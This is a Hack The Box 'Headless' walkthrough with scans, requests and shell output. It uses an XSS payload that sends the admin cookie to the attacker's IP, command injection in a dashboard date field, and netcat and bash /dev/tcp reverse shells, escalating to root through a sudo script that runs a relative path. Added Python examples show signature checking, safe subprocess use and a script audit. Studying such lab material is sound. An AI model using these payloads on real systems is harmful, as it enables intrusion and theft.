
HTB Headless done

Headless

Notes

port 5000
Werkzeug/2.2.2 Python/3.11.2
Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs

OS:

Linux

Technology:

Werkzeug/2.2.2 Python/3.11.2

IP Address:

10.10.11.8

Open ports:

22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
5000/tcp open  upnp?

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.8_nmap 10.10.11.8 ; cat 10.10.11.8_nmap.nmap | grep "tcp.*open"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 01:01 CEST
Nmap scan report for 10.10.11.8
Host is up (0.034s latency).
Not shown: 65476 closed tcp ports (reset), 57 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Sun, 28 Jul 2024 23:01:57 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2799
|     Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Under Construction</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f7f7f7;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     height: 100vh;
|     .container {
|     text-align: center;
|     background-color: #fff;
|     border-radius: 10px;
|     box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

Ffuf - http://10.10.11.8:5000

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ ffuf -u http://10.10.11.8:5000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.10.11.8_5000_ffuz -of all -e .php,.html,.txt,.bac,.backup

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.8:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup 
 :: Output file      : 10.10.11.8_5000_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

dashboard               [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 62ms]
support                 [Status: 200, Size: 2363, Words: 836, Lines: 93, Duration: 35ms]
:: Progress: [122814/122814] :: Job [1/1] :: 435 req/sec :: Duration: [0:08:35] :: Errors: 0 ::

Open website: http://10.10.11.8:5000/support

1) We try sending a message with an XSS payload
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
---
2) We add a second XSS payload in the User-Agent header
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: <script>alert("XSS")</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
* Start netcat and grab the admin cookie

Admin cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 56634
GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1
Host: 10.10.15.88
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:5000/
Connection: keep-alive
---
Create an XSS payload via Burp

Payload: <img src=x onerror=this.src='http://10.10.15.88/?c='+document.cookie>
___
POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: <img src=x onerror=this.src='http://10.10.15.88/?c='+document.cookie>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=pentester&lname=pentest&email=pentester%40test.pl&phone=123123123&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Open website: http://10.10.11.8:5000/dashboard

We use the admin cookie to log in to /dashboard
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
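The is_admin cookie is an itsdangerous-style signed value: a base64url JSON payload, a dot, then an HMAC over that payload. As an added example (not from the writeup), the block below decodes both cookies seen above and shows why a server must verify the signature with its secret instead of trusting the role string. The key derivation mirrors the default itsdangerous.Signer scheme (SHA-1 HMAC, key = sha1(salt + b"signer" + secret)); the secret used here is a constructed placeholder, the box's real key is not on the page.

```python
"""Decode and verify itsdangerous-style signed cookies (is_admin=<payload>.<sig>)."""
import base64
import hashlib
import hmac
import json

DEFAULT_SALT = b"itsdangerous.Signer"      # itsdangerous default salt
EXAMPLE_SECRET = b"example-secret-not-real"  # constructed placeholder, not the box's key


def _b64url_decode(s: str) -> bytes:
    # itsdangerous strips '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def read_payload(cookie: str):
    """Return the cleartext payload WITHOUT checking the signature.
    Anyone holding the cookie can do this: the role is readable, only tamper-evident."""
    payload_b64, _sig = cookie.rsplit(".", 1)
    return json.loads(_b64url_decode(payload_b64))


def _derive_key(secret: bytes, salt: bytes) -> bytes:
    # "django-concat" key derivation, the itsdangerous default
    return hashlib.sha1(salt + b"signer" + secret).digest()


def sign(value, secret: bytes, salt: bytes = DEFAULT_SALT) -> str:
    """Produce <base64url(json)>.<base64url(hmac-sha1)> like itsdangerous.Signer."""
    payload_b64 = _b64url_encode(json.dumps(value).encode())
    sig = hmac.new(_derive_key(secret, salt), payload_b64.encode(), hashlib.sha1).digest()
    return f"{payload_b64}.{_b64url_encode(sig)}"


def verify(cookie: str, secret: bytes, salt: bytes = DEFAULT_SALT):
    """Return the payload only if the signature matches the secret, else None.
    This is the check the server must rely on; read_payload() alone proves nothing."""
    try:
        payload_b64, sig_b64 = cookie.rsplit(".", 1)
        given = _b64url_decode(sig_b64)
    except (ValueError, base64.binascii.Error):
        return None
    expected = hmac.new(_derive_key(secret, salt), payload_b64.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, given):
        return None
    return json.loads(_b64url_decode(payload_b64))
```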

Command injection via Burp

* I put the command into the POST parameter "date"
date=2023-09-15;id
___
Request:
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1

date=2023-09-15;id
__
Response:
Administrator Dashboard</h1>
        <p>Generate a website health report:</p>

        <form action="/dashboard" method="post">
            <label for="date">Select Date:</label>
            <input type="date" id="date" name="date" value="2023-09-15" required>
            <button type="submit">Generate Report</button>
        </form>
    </div>
    <div id="output-container">
    <div id="output-content" style="background-color: green; color: white; padding: 10px; border-radius: 5px;">
        Systems are up and running!
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
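Why "date=2023-09-15;id" ran id, and how the dashboard should handle the parameter. This is an added example, not the box's code: the real report command is not on the page, so an echo stands in for it. The unsafe function interpolates the value into a shell string; the safe one allow-lists the date and passes it as a single argv element with shell=False.

```python
"""Command injection through a date parameter: vulnerable pattern next to the fix."""
import re
import subprocess
from datetime import date

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def parse_report_date(raw: str) -> date:
    """Allow-list: exactly YYYY-MM-DD and a real calendar date, nothing else."""
    if not DATE_RE.fullmatch(raw):
        raise ValueError(f"rejected date parameter: {raw!r}")
    return date.fromisoformat(raw)  # also rejects 2023-13-45 and similar


def run_report_unsafe(user_date: str) -> str:
    """Vulnerable pattern (assumed to resemble /dashboard): the parameter lands
    inside a shell command line, so ';' ends the echo and starts a second command."""
    cmd = f"echo Report for {user_date}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_report_safe(user_date: str) -> str:
    """Hardened: validate first, then run with an argv list and shell=False.
    Even without validation the argv form would pass ';id' through as literal text;
    validation is the second layer that keeps garbage out of the report."""
    d = parse_report_date(user_date)
    argv = ["echo", "Report", "for", d.isoformat()]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def is_injection_attempt(user_date: str) -> bool:
    """Detection helper for request logs: a date field carrying shell metacharacters."""
    return bool(re.search(r"[;&|`$(){}<>\n]", user_date))
```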

Create revshell via Burp

* Create revshell
Payload: nc+10.10.15.88+82+-e+/bin/bash
___
Request:
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1

date=2023-09-15;nc+10.10.15.88+82+-e+/bin/bash
---
* Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 82
listening on [any] 82 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 39494
whereis python
python:
python -V
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c /bin/bash
Script started, output log file is '/dev/null'.
dvir@headless:~/app$ 

Read flag: user.txt

dvir@headless:~/app$ ls -l /home
ls -l /home
total 4
drwx------ 8 dvir dvir 4096 Feb 16 23:49 dvir
dvir@headless:~/app$ cd /home/dvir
cd /home/dvir
dvir@headless:~$ ls -la
ls -la
total 48
drwx------  8 dvir dvir 4096 Feb 16 23:49 .
drwxr-xr-x  3 root root 4096 Sep  9  2023 ..
drwxr-xr-x  3 dvir dvir 4096 Feb 16 23:49 app
lrwxrwxrwx  1 dvir dvir    9 Feb  2 16:05 .bash_history -> /dev/null
-rw-r--r--  1 dvir dvir  220 Sep  9  2023 .bash_logout
-rw-r--r--  1 dvir dvir 3393 Sep 10  2023 .bashrc
drwx------ 12 dvir dvir 4096 Sep 10  2023 .cache
lrwxrwxrwx  1 dvir dvir    9 Feb  2 16:05 geckodriver.log -> /dev/null
drwx------  3 dvir dvir 4096 Feb 16 23:49 .gnupg
drwx------  4 dvir dvir 4096 Feb 16 23:49 .local
drwx------  3 dvir dvir 4096 Sep 10  2023 .mozilla
-rw-r--r--  1 dvir dvir  807 Sep  9  2023 .profile
lrwxrwxrwx  1 dvir dvir    9 Feb  2 16:06 .python_history -> /dev/null
drwx------  2 dvir dvir 4096 Feb 16 23:49 .ssh
-rw-r-----  1 root dvir   33 Aug  1 07:03 user.txt
dvir@headless:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
e3553dbac3ac781cefa7e9ad8e745e8e
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:d9:35 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.8/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:d935/64 scope global dynamic mngtmpaddr 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:fe94:d935/64 scope link 
       valid_lft forever preferred_lft forever
dvir@headless:~$ 

Privilege Escalation

Check sudo -l

dvir@headless:~/app$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

Read details about the file /usr/bin/syscheck

dvir@headless:~/app$ ls -la /usr/bin/syscheck ; cat /usr/bin/syscheck
ls -la /usr/bin/syscheck ; cat /usr/bin/syscheck
-r-xr-xr-x 1 root root 768 Feb  2 16:11 /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0
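What makes syscheck exploitable is that a root-only script reachable through sudo NOPASSWD executes a relative path (./initdb.sh) without ever pinning its working directory, so the caller's cwd decides which initdb.sh runs. As an added example (not part of the writeup), this small Python audit flags that pattern in a sudo-permitted script; the script text is an abridged copy of the cat output above.

```python
"""Flag cwd-dependent relative executions in scripts that run via sudo."""
import re
from typing import List, Tuple

# Abridged copy of /usr/bin/syscheck as shown in the writeup.
SYSCHECK = r'''#!/bin/bash
if [ "$EUID" -ne 0 ]; then
  exit 1
fi
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi
exit 0
'''

# A command token in command position that starts with ./ or ../
RELATIVE_EXEC = re.compile(r"(?:^|[;&|(]\s*|\bthen\s+|\bdo\s+|\belse\s+)(\.{1,2}/[\w./-]+)")
# An absolute cd pins the cwd for everything that follows
ABS_CD = re.compile(r"\bcd\s+/\S+")


def audit(script: str) -> List[Tuple[int, str]]:
    """Return (line_number, path) for every relative-path command that runs
    before the script has fixed its working directory with an absolute cd."""
    findings = []
    cwd_pinned = False
    for lineno, line in enumerate(script.splitlines(), 1):
        code = line.split("#", 1)[0].strip()  # drop comments and the shebang
        if not code:
            continue
        if ABS_CD.search(code):
            cwd_pinned = True
        for m in RELATIVE_EXEC.finditer(code):
            if not cwd_pinned:
                findings.append((lineno, m.group(1)))
    return findings


if __name__ == "__main__":
    for lineno, path in audit(SYSCHECK):
        print(f"line {lineno}: relative exec {path} depends on the caller's cwd")
```

The two fixes the audit accepts are an absolute path to the helper or an absolute cd before invoking it; the sudoers entry itself should also not hand root to a script that starts other programs.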

Create a revshell

dvir@headless:~/app$ cd /tmp/
cd /tmp/
dvir@headless:/tmp$ echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.88/4444 0>&1'" > /tmp/initdb.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.88/4444 0>&1'" > /tmp/initdb.sh
dvir@headless:/tmp$ 

dvir@headless:/tmp$ chmod a+rwx initdb.sh
chmod a+rwx initdb.sh
dvir@headless:/tmp$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.8G
System load average:  0.01, 0.02, 0.06
Database service is not running. Starting it...

Read flag: root.txt

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Headless]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.11.8] 39540
root@headless:/tmp# 

root@headless:/tmp# cd /root
cd /root
root@headless:~# ls -la
ls -la
total 40
drwx------  6 root root 4096 Aug  1 07:03 .
drwxr-xr-x 18 root root 4096 Feb 16 23:49 ..
lrwxrwxrwx  1 root root    9 Feb  2 16:07 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwx------  5 root root 4096 Sep 10  2023 .cache
-rw-------  1 root root   20 Feb 17 00:31 .lesshst
drwxr-xr-x  3 root root 4096 Sep 10  2023 .local
drwx------  3 root root 4096 Sep 10  2023 .mozilla
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Aug  1 07:03 root.txt
drwx------  2 root root 4096 Sep  9  2023 .ssh
root@headless:~# 

root@headless:~# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
78d17a30f3c84b89b5bf386c1cefc664
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:d9:35 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.8/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:d935/64 scope global dynamic mngtmpaddr 
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:fe94:d935/64 scope link 
       valid_lft forever preferred_lft forever
root@headless:~# 

References

Lessons Learned

Tags